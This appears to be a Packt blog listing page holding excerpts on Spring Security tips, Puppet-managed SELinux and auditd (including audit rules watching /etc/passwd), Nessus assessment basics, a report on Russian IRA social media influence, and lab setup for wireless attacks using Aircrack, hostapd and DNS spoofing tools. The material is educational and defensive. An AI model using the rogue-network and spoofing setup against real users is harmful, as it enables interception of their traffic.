typically allow selective examination (and even editing) of cookie values. The second (admittedly minor) difficulty is decoding the cookie value. You can feed the cookie value into an online or offline Base64 decoder (remember to add a trailing = sign to make it a valid Base64-encoded string!)   Making effective use of an in-memory UserDetailsService Tip: A very common scenario for the use of an in-memory UserDetailsService and hard-coded user lists is the authoring of unit tests for secured components. Unit test authors often code or configure the minimal context to test the functionality of the component under test. Using an in-memory UserDetailsService with a well-defined set of users and GrantedAuthority values provides the test author with an easily controlled test environment.   Storing sensitive information Tip: Many guidelines that apply to storage of passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways, for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards).   Annotations at the class level Tip: Be aware that the method-level security annotations can also be applied at the class level as well! Method-level annotations, if supplied, will always override annotations specified at the class level. This can be helpful if your business needs dictate specification of security policies for an entire class at a time. Take care to use this functionality in conjunction with good comments and coding standards, so that developers are very clear about the security characteristics of a class and its methods.   Authenticating the user against LDAP Tip: Do not make the very common mistake of configuring an <authentication-provider> with a user-details-service-ref referring to an LdapUserDetailsService, if you are intending to authenticate the user against LDAP itself!   Externalize URLs and environment-dependent settings Tip: Coding URLs into Spring configuration files is a bad idea. Typically, storage and consistent reference to URLs is pulled out into a separate properties file, with placeholders consistent with the Spring PropertyPlaceholderConfigurer. This allows for reconfiguration of environment-specific settings via externalizable properties files without touching the Spring configuration files, and is generally considered good practice. Summary In this article we took a look at some of the tips and tricks for Spring Security. Further resources on this subject: Spring Security 3 [Book] Migration to Spring Security 3 [Article] Opening up to OpenID with Spring Security [Article] Spring Security: Configuring Secure Passwords [Article]
Read more
  • 0
  • 0
  • 2754

article-image-puppet-and-os-security-tools
Packt
27 Mar 2015
17 min read
Save for later

Puppet and OS Security Tools

Packt
27 Mar 2015
17 min read
In this article by Jason Slagle, author of the book Learning Puppet Security, covers using Puppet to manage SELinux and auditd. We learned a lot so far about using Puppet to secure your systems as, well as how to use it to make groups of systems more secure. However, in all of that, we've not yet covered some of the basic OS-level functions that are available to secure a system. In this article, we'll review several of those functions. (For more resources related to this topic, see here.) SELinux is a powerful tool in the security arsenal. Most administrators experience with it, is along the lines of "how can I turn that off ?" This is born out of frustration with the poor documentation about the tool, as well as the tedious nature of the configuration. While Puppet cannot help you with the documentation (which is getting better all the time), it can help you with some of the other challenges that SELinux can bring. That is, ensuring that the proper contexts and policies are in place on the systems being managed. In this article, we'll cover the following topics related to OS-level security tools: A brief introduction to SELinux and auditd The built-in Puppet support for SELinux Community modules for SELinux Community modules for auditd At the end of this article, you should have enough skills so that you no longer need to disable SELinux. However, if you still need to do so, it is certainly possible to do via the modules presented here. Introducing SELinux and auditd During the course of this article, we'll explore the SELinux framework for Linux and see how to automate it using Puppet. As part of the process, we'll also review auditd, the logging and auditing framework for Linux. Using Puppet, we can automate the configuration of these often-neglected security tools, and even move the configuration of these tools for various services to the modules that configure those services. The SELinux framework SELinux is a security system for Linux originally developed by the United States National Security Agency (NSA). It is an in-kernel protection mechanism designed to provide Mandatory Access Controls (MACs) to the Linux kernel. SELinux isn't the only MAC framework for Linux. AppArmor is an alternative MAC framework included in the Linux kernel since Version 2.6.30. We choose to implement SELinux; since it is the default framework used under Red Hat Linux, which we're using for our examples. More information on AppArmor can be found at http://wiki.apparmor.net/index.php/Main_Page. These access controls work by confining processes to the minimal amount of files and network access that the processes require to run. By doing this, the controls limit the amount of collateral damage that can be done by a process, which becomes compromised. SELinux was first merged to the Linux mainline kernel for the 2.6.0 release. It was introduced into Red Hat Enterprise Linux with Version 4, and into Ubuntu in Version 8.04. With each successive release of the operating systems, support for SELinux grows, and it becomes easier to use. SELinux has a couple of core concepts that we need to understand to properly configure it. The first are the concepts of types and contexts. A type in SELinux is a grouping of similar things. Files used by Apache may be httpd_sys_content_t, for instance, which is a type that all content served by HTTP would have. The httpd process itself is of type httpd_t. These types are applied to objects, which represent discrete things, such as files and ports, and become part of the context of that object. The context of an object represents the object's user, role, type, and optionally data on multilevel security. For this discussion, the type is the most important component of the context. Using a policy, we grant access from the subject, which represents a running process, to various objects that represent files, network ports, memory, and so on. We do that by creating a policy that allows a subject to have access to the types it requires to function. SELinux has three modes that it can operate in. The first of these modes is disabled. As the name implies, the disabled mode runs without any SELinux enforcement. The second mode is called permissive. In permissive mode, SELinux will log any access violations, but will not act on them. This is a good way to get an idea of where you need to modify your policy, or tune Booleans to get proper system operations. The final mode, enforcing, will deny actions that do not have a policy in place. Under Red Hat Linux variants, this is the default SELinux mode. By default, Red Hat 6 runs SELinux with a targeted policy in enforcing mode. This means, that for the targeted daemons, SELinux will enforce its policy by default. An example is in order here, to explain this well. So far, we've been operating with SELinux disabled on our hosts. The first step in experimenting with SELinux is to turn it on. We'll set it to permissive mode at first, while we gather some information. To do this, after starting our master VM, we'll need to modify the SELinux configuration and reboot. While it's possible to change from enforcing mode to either permissive or disabled mode without a reboot, going back requires us to reboot. Let's edit the /etc/sysconfig/selinux file and set the SELINUX variable to permissive on our puppetmaster. Remember to start the vagrant machine and SSH in as it is necessary. Once this is done, the file should look as follows: Once this is complete, we need to reboot. To do so, run the following command: sudo shutdown -r now Wait for the system to come back online. Once the machine is back up and you SSH back into it, run the getenforce command. It should return permissive, which means SELinux is running, but not enforced. Now, we can make sure our master is running and take a look at its context. If it's not running, you can start the service with the sudo service puppetmaster start command. Now, we'll use the -Z flag on the ps command to examine the SELinux flag. Many commands, such as ps and ls use the -Z flag to view the SELinux data. We'll go ahead and run the following command to view the SELinux data for the running puppetmaster: ps -efZ|grep puppet When you do this, you'll see a Linux output, such as follows: unconfined_u:system_r:initrc_t:s0 puppet 1463     1 1 11:41 ? 00:00:29 /usr/bin/ruby /usr/bin/puppet master If you take a look at the first part of the output line, you'll see that Puppet is running in the unconfined_u:system_r:initrc_t context. This is actually somewhat of a bug and a result of the Puppet policy on CentOS 6 being out of date. We should actually be running under the system_u:system_r:puppetmaster_t:s0 context, but the policy is for a much older version of Puppet, so it runs unconfined. Let's take a look at the sshd process to see what it looks like also. To do so, we'll just grep for sshd instead: ps -efZ|grep sshd The output is as follows: system_u:system_r:sshd_t:s0-s0:c0.c1023 root 1206 1 0 11:40 ? 00:00:00 /usr/sbin/sshd This is a more traditional output one would expect. The sshd process is running under the system_u:system_r:sshd_t context. This actually corresponds to the system user, the system role, and the sshd type. The user and role are SELinux constructs that help you allow role-based access controls. The users do not map to system users, but allow us to set a policy based on the SELinux user object. This allows role-based access control, based on the SELinux user. Previously the unconfined user was a user that will not be enforced. Now, we can take a look at some objects. Doing a ls -lZ /etc/ssh command results in the following: As you can see, each of the files belongs to a context that includes the system user, as well as the object role. They are split among the etc type for configuration files and the sshd_key type for keys. The SSH policy allows the sshd process to read both of these file types. Other policies, say, for NTP, would potentially allow the ntpd process to read the etc types, but it would not be able to read the sshd_key files. This very fine-grained control is the power of SELinux. However, with great power comes very complex configuration. Configuration can be confusing to set up, if it doesn't happen correctly. For instance, with Puppet, the wrong type can potentially impact the system if not dealt with. Fortunately, in permissive mode, we will log data that we can use to assist us with this. This leads us into the second half of the system that we wish to discuss, which is auditd. In the meantime, there is a bunch of information on SELinux available on its website at http://selinuxproject.org/page/Main_Page. There's also a very funny, but informative, resource available describing SELinux at https://people.redhat.com/duffy/selinux/selinux-coloring-book_A4-Stapled.pdf. The auditd framework for audit logging SELinux does a great job at limiting access to system components; however, reporting what enforcement took place was not one of its objectives. Enter the auditd. The auditd is an auditing framework developed by Red Hat. It is a complete auditing system using rules to indicate what to audit. This can be used to log SELinux events, as well as much more. Under the hood, auditd has hooks into the kernel to watch system calls and other processes. Using the rules, you can configure logging for any of these events. For instance, you can create a rule that monitors writes to the /etc/passwd file. This would allow you to see if any users were added to the system. We can also add monitoring of files, such as lastlog and wtmp to monitor the login activity. We'll explore this example later when we configure auditd. To quickly see how a rule works, we'll manually configure a quick rule that will log the time when the wtmp file was edited. This will add some system logging around users logging in. To do this, let's edit the /etc/audit/audit.rules file to add a rule to monitor this. Edit the file and add the following lines: -w /var/log/wtmp -p wa -k logins-w /etc/passwd –p wa –k password We'll take a look at what the preceding lines do. These lines both start with the –w clauses. These indicate the files that we are monitoring. Second, we have the –p clauses. This lets you set what file operations we monitor. In this case, it is write and append operations. Finally, with the the –k entries, we're setting a keyword that is logged and can be filtered on. This should go at the end of the file. Once it's done, reload auditd with the following command: sudo service auditd restart Once this is complete, go ahead and log another ssh session in. Once you can simply log, back out. Once this is done, take a look at the /var/log/audit/audit.log file. You should see the content like the following: type=SYSCALL msg=audit(1416795396.816:482): arch=c000003e syscall=2 success=yes exit=8 a0=7fa983c446aa a1=1 a2=2 a3=7fff3f7a6590 items=1 ppid=1206 pid=2202 auid=500 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=51 comm="sshd" exe="/usr/sbin/sshd" subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 key="logins"type=SYSCALL msg=audit(1416795420.057:485): arch=c000003e syscall=2 success=yes exit=7 a0=7fa983c446aa a1=1 a2=2 a3=8 items=1 ppid=1206 pid=2202 auid=500 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=51 comm="sshd" exe="/usr/sbin/sshd" subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 key="logins" There are tons of fields in this output, including the SELinux context, the userID, and so on. Of interest is the auid, which is the audit user ID. On commands run via the sudo command, this will still contain the user ID of the user who called sudo. This is a great way to log commands performed via sudo. Auditd also logs SELinux failures. They get logged under the type AVC. These access vector cache logs will be placed in the auditd log file when a SELinux violation occurs. Much like SELinux, auditd is somewhat complicated. The intricacies of it are beyond the scope of this book. You can get more information at http://people.redhat.com/sgrubb/audit/. SELinux and Puppet Puppet has direct support for several features of SELinux. There are two native Puppet types for SELinux: selboolean and selmodule. These types support setting SELinux Booleans and installing SELinux policy modules. SELinux Booleans are variables that impact on how SELinux behaves. They are set to allow various functions to be permitted. For instance, you set a SELinux Boolean to true to allow the httpd process to access network ports. SELinux modules are groupings of policies. They allow policies to be loaded in a more granular way. The Puppet selmodule type allows Puppet to load these modules. The selboolean type The targeted SELinux policy that most distributions use is based on the SELinux reference policy. One of the features of this policy is the use of Boolean variables that control actions of the policy. There are over 200 of these Booleans on a Red Hat 6-based machine. We can investigate them by installing the policycoreutils-python package on the operating system. You can do this by executing the following command: sudo yum install policycoreutils-python Once installed, we can run the semanage boolean -l command to get a list of the Boolean values, along with their descriptions. The output of this will look as follows: As you can see, there exists a very large number of settings that can be reconfigured, simply by setting the appropriate Boolean value. The selboolean Puppet type supports managing these Boolean values. The provider is fairly simple, accepting the following values: Parameter Description name This contains the name of the Boolean to be set. It defaults to the title. persistent This checks whether to write the value to disk for the next boot. provider This is the provider for the type. Usually, the default getsetsebool value is accepted. value This contains the value of the Boolean, true or false. Usage of this type is rather simple. We'll show an example that will set the puppetmaster_use_db parameter to true value. If we are using the SELinux Puppet policy, this would allow the master to talk to a database. For our use, it's a simple unused variable that we can use for demonstration purposes. As a reminder, the SElinux policy for Puppet on CentOS 6 is outdated, so setting the Boolean does not impact the version of Puppet we're running. It does, however, serve to show how a Boolean is set. To do this, we'll create a sample role and profile for our puppetmaster. This is something that would likely exist in a production environment to manage the configuration of the master. In this example, we'll simply build a small profile and role for the master. Let's start with the profile. Copy over the profiles module we've slowly been building up, and let's add a puppetmaster.pp profile. To do so, edit the profiles/manifests/puppetmaster.pp file and make it look as follows: class profiles::puppetmaster {selboolean { 'puppetmaster_use_db':   value     => on,   persistent => true,}} Then, we'll move on to the role. Copy the roles, and edit the roles/manifests/puppetmaster.pp file there and make it look as follows: class roles::puppetmaster {include profiles::puppetmaster} Once this is done, we can apply it to our host. Edit the /etc/puppet/manifests/site.pp file. We'll apply the puppetmaster role to the puppetmaster machine, as follows: node 'puppet.book.local' {include roles::puppetmaster} Now, we'll run Puppet and get the output as follows: As you can see, it set the value to on when run. Using this method, we can set any of the SELinux Boolean values we need for our system to operate properly. More information on SELinux Booleans with information on how to obtain a list of them can be found at https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Security-Enhanced_Linux/sect-Security-Enhanced_Linux-Working_with_SELinux-Booleans.html. The selmodule type The other native type inside Puppet is a type to manage the SELinux modules. Modules are compiled collections of the SELinux policy. They're loaded into the kernel using the selmodule command. This Puppet type provides support for this mechanism. The available parameters are as follows: Parameter Description name This contains the name of the module— it defaults to the title ensure This is the desired state—present or absent provider This specifies the provider for the type—it should be selmodule selmoduledir This is the directory that contains the module to be installed selmodulepath This provides the complete path to the module to be installed if not present in selmoduledir syncversion This checks whether to resync the module if a new version is found, such as ensure => latest  Using the module, we can take our compiled module and serve it onto the system with Puppet. We can then use the module to ensure that it gets installed on the system. This lets us centrally manage the module with Puppet. We'll see an example where this module compiles a policy and then installs it, so we won't show a specific example here. Instead, we'll move on to talk about the last SELinux-related component in Puppet. File parameters for SELinux The final internal support for SELinux types comes in the form of the file type. The file type parameters are as follows: Parameter Description selinux_ignore_defaults By default, Puppet will use the matchpathcon function to set the context of a file. This overrides that behavior if set to true value. Selrange This sets the SELinux range component. We've not really covered this. It's not used in most mainstream distributions at the time this book was written. Selrole This sets the SELinux role on the file. seltype This sets the SELinux type on the file. seluser This sets the SELinux role on the file. Usually, if you place files in the correct location (the expected location for a service) on the filesystem, Puppet will get the SELinux properties correct via its use of the matchpathcon function. This function (which also has a matching utility) applies a default context based on the policy settings. Setting the context manually is used in cases where you're storing data outside the normal location. For instance, you might be storing web data under the /opt file. The preceding types and providers provide the basics that allow you to manage SELinux on a system. We'll now take a look at a couple of community modules that build on these types and create a more in-depth solution. Summary This article looked at what SELinux and auditd were, and gave a brief example of how they can be used. We looked at what they can do, and how they can be used to secure your systems. After this, we looked at the specific support for SELinux in Puppet. We looked at the two built-in types to support it, as well as the parameters on the file type. Then, we took a look at one of the several community modules for managing SELinux. Using this module, we can store the policies as text instead of compiled blobs. Resources for Article: Further resources on this subject: The anatomy of a report processor [Article] Module, Facts, Types and Reporting tools in Puppet [Article] Designing Puppet Architectures [Article]
Read more
  • 0
  • 0
  • 2748

article-image-fundamentals
Packt
20 Jan 2014
4 min read
Save for later

Fundamentals

Packt
20 Jan 2014
4 min read
(For more resources related to this topic, see here.) Vulnerability Assessment and Penetration Testing Vulnerability Assessment ( VA) and Penetrating Testing ( PT or PenTest ) are the most common types of technical security risk assessments or technical audits conducted using different tools. These tools provide best outcomes if they are used optimally. An improper configuration may lead to multiple false positives that may or may not reflect true vulnerabilities. Vulnerability assessment tools are widely used by all, from small organizations to large enterprises, to assess their security status. This helps them with making timely decisions to protect themselves from these vulnerabilities. Vulnerability Assessments and PenTests using Nessus. Nessus is a widely recognized tool for such purposes. This section introduces you to basic terminology with reference to these two types of assessments. Vulnerability in terms of IT systems can be defined as potential weaknesses in system/infrastructure that, if exploited, can result in the realization of an attack on the system. An example of a vulnerability is a weak, dictionary-word password in a system that can be exploited by a brute force attack (dictionary attack) attempting to guess the password. This may result in the password being compromised and an unauthorized person gaining access to the system. Vulnerability Assessment is a phase-wise approach to identifying the vulnerabilities existing in an infrastructure. This can be done using automated scanning tools such as Nessus, which uses its set of plugins corresponding to different types of known security loopholes in infrastructure, or a manual checklist-based approach that uses best practices and published vulnerabilities on well-known vulnerability tracking sites. The manual approach is not as comprehensive as a tool-based approach and will be more time-consuming. The kind of checks that are performed by a vulnerability assessment tool can also be done manually, but this will take a lot more time than an automated tool. Penetration Testing has an additional step for vulnerability assessment, exploiting the vulnerabilities. Penetration Testing is an intrusive test, where the personnel doing the penetration test will first do a vulnerability assessment to identify the vulnerabilities, and as a next step, will try to penetrate the system by exploiting the identified vulnerabilities. Need for Vulnerability Assessment It is very important for you to understand why Vulnerability Assessment or Penetration Testing is required. Though there are multiple direct or indirect benefits for conducting a vulnerability assessment or a PenTest, a few of them have been recorded here for your understanding. Risk prevention Vulnerability Assessment uncovers the loopholes/gaps/vulnerabilities in the system. By running these scans on a periodic basis, an organization can identify known vulnerabilities in the IT infrastructure in time. Vulnerability Assessment reduces the likelihood of noncompliance to the different compliance and regulatory requirements since you know your vulnerabilities already. Awareness of such vulnerabilities in time can help an organization to fi x them and mitigate the risks involved in advance before they get exploited. The risks of getting a vulnerability exploited include: Financial loss due to vulnerability exploits Organization reputation Data theft Confidentiality compromise Integrity compromise Availability compromise Compliance requirements The well-known information security standards (for example, ISO 27001, PCI DSS, and PA DSS) have control requirements that mandate that a Vulnerability Assessment must be performed. A few countries have specific regulatory requirements for conducting Vulnerability Assessments in some specific industry sectors such as banking and telecom. The life cycles of Vulnerability Assessment and Penetration Testing This section describes the key phases in the life cycles of VA and PenTest. These life cycles are almost identical; Penetration Testing involves the additional step of exploiting the identified vulnerabilities. It is recommended that you perform testing based on the requirements and business objectives of testing in an organization, be it Vulnerability Assessment or Penetration Testing. The following stages are involved in this life cycle: Scoping Information gathering Vulnerability scanning False positive analysis Vulnerability exploitation (Penetration Testing) Report generation The following figure illustrates the different sequential stages recommended to follow for a Vulnerability Assessment or Penetration Testing: Summary In this article, we covered an introduction to Vulnerability Assessment and Penetration Testing, along with an introduction to Nessus as a tool and steps on installing and setting up Nessus. Resources for Article: Further resources on this subject: CISSP: Vulnerability and Penetration Testing for Access Control [Article] Penetration Testing and Setup [Article] Web app penetration testing in Kali [Article]
Read more
  • 0
  • 0
  • 2744

article-image-how-ira-hacked-american-democracy-using-social-media-and-meme-warfare-to-promote-disinformation-and-polarization-a-new-report-to-senate-intelligence-committee
Natasha Mathur
18 Dec 2018
9 min read
Save for later

How IRA hacked American democracy using social media and meme warfare to promote disinformation and polarization: A new report to Senate Intelligence Committee

Natasha Mathur
18 Dec 2018
9 min read
A new report prepared for the Senate Intelligence Committee by the cybersecurity firm, New Knowledge was released yesterday. The report titled “The Tactics & Tropes of the Internet Research Agency” provides an insight into how IRA a group of Russian agents used and continue to use social media to influence politics in America by exploiting the political and racial separation in American society.   “Throughout its multi-year effort, the Internet Research Agency exploited divisions in our society by leveraging vulnerabilities in our information ecosystem. We hope that our work has resulted in a clearer picture for policymakers, platforms, and the public alike and thank the Senate Select Committee on Intelligence for the opportunity to serve”, says the report. Russian interference during the 2016 Presidential Elections comprised of Russian agents trying to hack the online voting systems, making cyber-attacks aimed at Democratic National Committee and Russian tactics of social media influence to exacerbate the political and social divisions in the US. As a part of SSCI’s investigation into IRA’s social media activities, some of the social platforms companies such as Twitter, Facebook, and Alphabet that were misused by the IRA, provided data related to IRA influence tactics. However, none of these platforms provided complete sets of related data to SSCI. “Some of what was turned over was in PDF form; other datasets contained extensive duplicates. Each lacked core components that would have provided a fuller and more actionable picture. The data set provided to the SSCI for this analysis includes data previously unknown to the public.and..is the first comprehensive analysis by entities other than the social platforms”, reads the report.   The report brings to light IRA’s strategy that involved deciding on certain themes, primarily social issues and then reinforcing these themes across its Facebook, Instagram, and YouTube content. Different topics such as black culture, anti-Clinton, pro-trump, anti-refugee, Muslim culture, LGBT culture, Christian culture, feminism, veterans, ISIS, and so on were grouped thematically on Facebook Pages and Instagram accounts to reinforce the culture and to foster the feelings of pride.  Here is a look at some key highlights from the report. Key Takeaways IRA used Instagram as the biggest tool for influence As per the report, Facebook executives, during the Congressional testimony held in April this year, hid the fact that Instagram played a major role in IRA’s influence operation. There were about 187 million engagements on Instagram compared to 76.5 million on Facebook and 73 million on Twitter, according to a data set of posts between 2015 and 2018. In 2017, IRA moved much of its activity and influence operations to Instagram as media started looking into Facebook and Twitter operations. Instagram was the most effective platform for the Internet Research Agency and approximately 40% of Instagram accounts achieved over 10,000 followers (a level referred to as “micro-influencers” by marketers) and twelve of these accounts had over 100,000 followers (“influencer” level).                                     The Tactics & Tropes of IRA “Instagram engagement outperformed Facebook, which may indicate its strength as a tool in image-centric memetic (meme) warfare. Our assessment is that Instagram is likely to be a key battleground on an ongoing basis,” reads the report. Apart from social media posts, another feature of Instagram platform activity by IRA was merchandise. This merchandise promotion aimed at building partnerships for boosting audience growth and getting the audience data. This was especially evident in the black targeted communities with hashtags #supportblackbusiness and #buyblack appearing quite frequently. In fact, sometimes these IRA pages also offered coupons in exchange for sharing content.                                               The Tactics & Tropes of IRA IRA promoted Voter Suppression Operations The report states that although Twitter and Facebook were debating on determining if there was any voter suppression content present on these platforms, three major variants of voter suppression narratives was found widespread on Twitter, Facebook, Instagram, and YouTube.  These included malicious misdirection (eg: tweets promoting false voting rules), candidates supporting redirection, and turnout depression ( eg: no need to vote, your vote doesn’t matter). The Tactics & Tropes of IRA For instance, few days before the 2016 presidential elections in the US, IRA started to implement voter suppression tactics on the Black-community targeted accounts. IRA started to spread content about voter fraud and delivering warnings that “election would be stolen and violence might be necessary”. These suppression narratives and content was largely targeted almost exclusively at the Black community on Instagram and Facebook. There was also the promotion of other kinds of content on topics such as alienation and violence to divert people’s attention away from politics. Other varieties of voter suppression narratives include: “don’t vote, stay home”, “this country is not for Black people”, “these candidates don’t care about Black people”, etc. Voter-suppression narratives aimed at non-black communities focused primarily on promoting identity and pride for communities like Native Americans, LGBT+, and Muslims. The Tactics & Tropes of IRA Then there were narratives that directly and broadly called out for voting for candidates apart from Hillary Clinton and pages on Facebook that posted repeatedly about voter fraud, stolen elections, conspiracies about machines provided by Soros, and rigged votes. IRA largely targeted black American communities IRA’s major efforts over Facebook and Instagram were targeted at Black communities in America and involved developing and recruiting Black Americans as assets. The report states that IRA adopted a cross-platform media mirage strategy which shared authentic black related content to create a strong influence on the black community over social media.   An example presented in the report is that of a case study of “Black Matters” which illustrates the extent to which IRA created “inauthentic media property” by creating different accounts across the social platforms to “reinforce its brand” and widely distribute its content.  “Using only the data from the Facebook Page posts and memes, we generated a map of the cross-linked properties – other accounts that the Pages shared from, or linked to – to highlight the complex web of IRA-run accounts designed to surround Black audiences,” reads the report. So, an individual who followed or liked one of the Black-community-targeted IRA Pages would get exposed to content from a dozen other pages more. Apart from IRA’s media mirage strategy, there was also the human asset recruitment strategy. It involved posts encouraging Americans to perform different types of tasks for IRA handlers. Some of these tasks included requests for contact with preachers from Black churches, soliciting volunteers to hand out fliers, offering free self-defense classes (Black Fist/Fit Black), requests for speakers at protests, etc. These posts appeared in the Black, Left, and Right-targeted groups, although they were mostly present in the black groups and communities. “The IRA exploited the trust of their Page audiences to develop human assets, at least some of whom were not aware of the role they played. This tactic was substantially more pronounced on Black-targeted accounts”, reads the report. IRA also created domain names such as blackvswhite.info, blackmattersusa.com, blacktivist.info, blacktolive.org, and so on. It also created YouTube channels like “Cop Block US” and “Don’t Shoot” to spread anti-Clinton videos. In response to these reports of specific black targeting at Facebook, National Association for the Advancement of Colored People (NAACP) returned a donation from Facebook and called on its users yesterday to log out of all Facebook-owned products such as Facebook, Instagram, and Whatsapp today. “NAACP remains concerned about the data breaches and numerous privacy mishaps that the tech giant has encountered in recent years, and is especially critical about those which occurred during the last presidential election campaign”, reads the NAACP announcement. IRA promoted Pro-Trump and anti-Clinton operations As per the report, IRA focussed on promoting political content surrounding pro-Donald Trump sentiments over different channels and pages regardless of whether these pages targeted conservatives, liberals, or racial and ethnic groups. The Tactics & Tropes of IRA On the other hand, large volumes of political content articulated anti-Hillary Clinton sentiments among both the Right and Left-leaning communities created by IRA. Moreover, there weren’t any communities or pages on Instagram and Facebook that favored Clinton. There were some pro-Clinton Twitter posts, however, most of the tweets were still largely anti-Clinton. The Tactics & Tropes of IRA Additionally, there were different YouTube channels created by IRA such as Williams & Kalvin, Cop Block US, don’t shoot, etc, and 25 videos across these different channels consisted election-related keywords in their title and all of these videos were anti-Hillary Clinton. An example presented in a report is of one of the political channels, Paul Jefferson, solicited videos for a #PeeOnHillary video challenge for which the hashtag appeared on Twitter and Instagram.  and shared submissions that it received. Other videos promoted by these YouTube channels were “The truth about elections”, “HILLARY RECEIVED $20,000 DONATION FROM KKK TOWARDS HER CAMPAIGN”, and so on. Also, on IRA’s Facebook account, the post with maximum shares and engagement was a conspiracy theory about President Barack Obama refusing to ban Sharia Law, and encouraging Trump to take action. The Tactics & Tropes of IRA Also, the number one post on Facebook featuring Hillary Clinton was a conspiratorial post that was made public a month before the election. The Tactics & Tropes of IRA These were some of the major highlights from the report. However, the report states that there is still a lot to be done with regard to IRA specifically. There is a need for further investigation of subscription and engagement pathways and only these social media platforms currently have that data. New Knowledge team hopes that these platforms will provide more data that can speak to the impact among the targeted communities. For more information into the tactics of IRA, read the full report here. Facebook, Twitter takes down hundreds of fake accounts with ties to Russia and Iran, suspected to influence the US midterm elections Facebook plans to change its algorithm to demote “borderline content” that promotes misinformation and hate speech on the platform Facebook’s outgoing Head of communications and policy takes the blame for hiring PR firm ‘Definers’ and reveals more
Read more
  • 0
  • 0
  • 2740
article-image-wireless-and-mobile-hacks
Packt
22 Jul 2014
6 min read
Save for later

Wireless and Mobile Hacks

Packt
22 Jul 2014
6 min read
(For more resources related to this topic, see here.) So I don't think it's possible to go to a conference these days and not see a talk on mobile or wireless. (They tend to schedule the streams to have both mobile and wireless talks at the same time—the sneaky devils. There is no escaping the wireless knowledge!) So, it makes sense that we work out some ways of training people how to skill up on these technologies. We're going to touch on some older vulnerabilities that you don't see very often, but as always, when you do, it's good to know how to insta-win. Wireless environment setup This article is a bit of an odd one, because with Wi-Fi and mobile, it's much harder to create a safe environment for your testers to work in. For infrastructure and web app tests, you can simply say, "it's on the network, yo" and they'll get the picture. However, Wi-Fi and mobile devices are almost everywhere in places that require pen testing. It's far too easy for someone to get confused and attempt to pwn a random bystander. While this sounds hilarious, it is a serious issue if that occurs. So, adhere to the following guidelines for safer testing: Where possible, try and test away from other people and networks. If there is an underground location nearby, testing becomes simpler as floors are more effective than walls for blocking Wi-Fi signals (contrary to the firmly held beliefs of anyone who's tried to improve their home network signal). If you're an individual who works for a company, or you know, has the money to make a Faraday cage, then by all means do the setup in there. I'll just sit here and be jealous. Unless it's pertinent to the test scenario, provide testers with enough knowledge to identify the devices and networks they should be attacking. A good way to go is to provide the Mac address as they very rarely collide. (Mac randomizing tools be damned.) If an evil network has to be created, name it something obvious and reduce the access to ensure that it is visible to as few people as possible. The naming convention we use is Connectingtomewillresultin followed by pain, death, and suffering. While this steers away the majority of people, it does appear to attract the occasional fool, but that's natural selection for you. Once again, but it is worth repeating, don't use your home network. Especially in this case, using your home equipment could expose you to random passersby or evil neighbors. I'm pretty sure my neighbor doesn't know how to hack, but if he does, I'm in for a world of hurt. Software We'll be using Kali Linux as the base for this article as we'll be using the tools provided by Kali to set up our networks for attack. Everything you need is built into Kali, but if you happen to be using another build such as Ubuntu or Debian, you will need the following tools: Iwtools (apt-get install iw): This is the wireless equivalent of ifconfig that allows the alteration of wireless adapters, and provides a handy method to monitor them. Aircrack suite (apt-get install aircrack-ng): The basic tools of wireless attacking are available in the Aircrack suite. This selection of tools provides a wide range of services, including cracking encryption keys, monitoring probe requests, and hosting rogue networks. Hostapd (apt-get install hostapd): Airbase-ng doesn't support WPA-2 networks, so we need to bring in the serious programs for serious people. This can also be used to host WEP networks, but getting Aircrack suite practice is not to be sniffed at. Wireshark (apt-get install wireshark): Wireshark is one of the most widely used network analytics tools. It's not only used by pen testers, but also by people who have CISSP and other important letters after their names. This means that it's a tool that you should know about. dnschef (https://thesprawl.org/projects/dnschef/): Thanks to Duncan Winfrey, who pointed me in this direction. DNSchef is a fantastic resource for doing DNS spoofing. Other alternatives include DNS spoof and Metasploit's Fake DNS. Crunch (apt-get install crunch): Crunch generates strings in a specified order. While it seems very simple, it's incredibly useful. Use with care though; it has filled more than one unwitting user's hard drive. Hardware You want to host a dodgy network. The first question to ask yourself, after the question you already asked yourself about software, is: is your laptop/PC capable of hosting a network? If your adapter is compatible with injection drivers, you should be fine. A quick check is to boot up Kali Linux and run sudo airmon-ng start <interface>. This will put your adapter in promiscuous mode. If you don't have the correct drivers, it'll throw an error. Refer to a potted list of compatible adapters at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers. However, if you don't have access to an adapter with the required drivers, fear not. It is still possible to set up some of the scenarios. There are two options. The first and most obvious is "buy an adapter." I can understand that you might not have a lot of cash kicking around, so my advice is to pick up an Edimax ew-7711-UAN—it's really cheap and pretty compact. It has a short range and is fairly low powered. It is also compatible with Raspberry Pi and BeagleBone, which is awesome but irrelevant. The second option is a limited solution. Most phones on the market can be used as wireless hotspots and so can be used to set up profiles for other devices for the phone-related scenarios in this article. Unfortunately, unless you have a rare and epic phone, it's unlikely to support WEP, so that's out of the question. There are solutions for rooted phones, but I wouldn't instruct you to root your phone, and I'm most certainly not providing a guide to do so. Realistically, in order to create spoofed networks effectively and set up these scenarios, a computer is required. Maybe I'm just not being imaginative enough.
Read more
  • 0
  • 0
  • 2728

article-image-stack-overflow-confirms-production-systems-hacked
Vincy Davis
17 May 2019
2 min read
Save for later

Stack Overflow confirms production systems hacked

Vincy Davis
17 May 2019
2 min read
